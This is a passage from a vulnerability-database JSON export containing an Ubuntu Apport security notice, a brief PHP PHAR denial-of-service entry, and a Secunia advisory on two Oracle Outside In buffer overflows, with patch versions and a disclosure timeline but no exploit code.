A local attacker could use this issue to elevate privileges.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n apport 2.19.1-0ubuntu4\r\n\r\nUbuntu 15.04:\r\n apport 2.17.2-0ubuntu1.7\r\n\r\nUbuntu 14.04 LTS:\r\n apport 2.14.1-0ubuntu3.18\r\n\r\nUbuntu 12.04 LTS:\r\n apport 2.0.1-0ubuntu17.13\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2782-1\r\n CVE-2015-1341\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/apport/2.19.1-0ubuntu4\r\n https://launchpad.net/ubuntu/+source/apport/2.17.2-0ubuntu1.7\r\n https://launchpad.net/ubuntu/+source/apport/2.14.1-0ubuntu3.18\r\n https://launchpad.net/ubuntu/+source/apport/2.0.1-0ubuntu17.13\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32660", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32660", "title": "[USN-2782-1] Apport vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-7803", "CVE-2015-7804"], "description": "PHAR extension DoS.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14753", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14753", "title": "PHP security vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4878", "CVE-2015-4877"], 
"description": "\r\n\r\n======================================================================\r\n\r\n Secunia Research (now part of Flexera Software) 26/10/2015\r\n\r\n Oracle Outside In Two Buffer Overflow Vulnerabilities\r\n\r\n======================================================================\r\nTable of Contents\r\n\r\nAffected Software....................................................1\r\nSeverity.............................................................2\r\nDescription of Vulnerabilities.......................................3\r\nSolution.............................................................4\r\nTime Table...........................................................5\r\nCredits..............................................................6\r\nReferences...........................................................7\r\nAbout Secunia........................................................8\r\nVerification.........................................................9\r\n\r\n======================================================================\r\n\r\n1) Affected Software\r\n\r\n* Oracle Outside In versions 8.5.0, 8.5.1, and 8.5.2.\r\n\r\n====================================================================== \r\n2) Severity\r\n\r\nRating: Moderately critical\r\nImpact: System Access\r\nWhere: From remote\r\n\r\n====================================================================== \r\n3) Description of Vulnerabilities\r\n\r\nSecunia Research has discovered two vulnerabilities in Oracle Outside\r\nIn Technology, which can be exploited by malicious people to cause a\r\nDoS (Denial of Service) and compromise an application using the SDK.\r\n\r\n1) An error in the vstga.dll when processing TGA files can be\r\nexploited to cause an out-of-bounds write memory access.\r\n\r\n2) An error in the libxwd2.dll when processing XWD files can be\r\nexploited to cause a stack-based buffer overflow.\r\n\r\nSuccessful exploitation of the vulnerabilities may allow execution 
of\r\narbitrary code.\r\n\r\n====================================================================== \r\n4) Solution\r\n\r\nApply update. Please see the Oracle Critical Patch Update Advisory\r\nfor October 2015 for details.\r\n\r\n====================================================================== \r\n5) Time Table\r\n\r\n14/07/2015 - Vendor notified of vulnerabilities.\r\n14/07/2015 - Vendor acknowledges report.\r\n16/07/2015 - Vendor supplied bug ticket ID.\r\n27/07/2015 - Vendor supplied information of fix in main codeline.\r\n24/09/2015 - Replied to vendor and asked about CVE references.\r\n25/09/2015 - Vendor replied that they check our request.\r\n27/09/2015 - Vendor assigned two CVE references.\r\n17/10/2015 - Vendor supplied 20/10/2015 as estimated fix date.\r\n20/10/2015 - Release of vendor patch.\r\n21/10/2015 - Public disclosure.\r\n26/10/2015 - Publication of research advisory.\r\n\r\n======================================================================\r\n\r\n6) Credits\r\n\r\nDiscovered by Behzad Najjarpour Jabbari, Secunia Research (now part\r\nof Flexera Software).\r\n\r\n======================================================================\r\n\r\n7) References\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned\r\nthe CVE-2015-4877 and CVE-2015-4878 identifiers for the\r\nvulnerabilities.\r\n\r\n======================================================================\r\n\r\n8) About Secunia (now part of Flexera Software)\r\n\r\nIn September 2015, Secunia has been acquired by Flexera Software:\r\n\r\nhttps://secunia.com/blog/435/\r\n\r\nSecunia offers vulnerability management solutions to corporate\r\ncustomers with verified and reliable vulnerability intelligence\r\nrelevant to their specific system configuration:\r\n\r\nhttp://secunia.com/advisories/business_solutions/\r\n\r\nSecunia also provides a publicly accessible and comprehensive advisory\r\ndatabase as a service to the security community and private\r\nindividuals, 
who are interested in or concerned about IT-security.\r\n\r\nhttp://secunia.com/advisories/\r\n\r\nSecunia believes that it is important to support the community and to\r\ndo active vulnerability research in order to aid improving the\r\nsecurity and reliability of software in general:\r\n\r\nhttp://secunia.com/secunia_research/\r\n\r\nSecunia regularly hires new skilled team members. Check the URL below\r\nto see currently vacant positions:\r\n\r\nhttp://secunia.com/corporate/jobs/\r\n\r\nSecunia offers a FREE mailing list called Secunia Security Advisories:\r\n\r\nhttp://secunia.com/advisories/mailing_lists/\r\n\r\n======================================================================\r\n\r\n9) Verification \r\n\r\nPlease verify this advisory by visiting the Secunia website:\r\nhttp://secunia.com/secunia_research/2015-04/\r\n\r\nComplete list of vulnerability reports published by Secunia Research:\r\nhttp://secunia.com/secunia_research/\r\n\r\n======================================================================\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32659", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32659", "title": "Secunia Research: Oracle Outside In Two Buffer Overflow Vulnerabilities", "type": "securityvulns", "cvss": {"score": 1.5, "vector": "AV:LOCAL/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}]}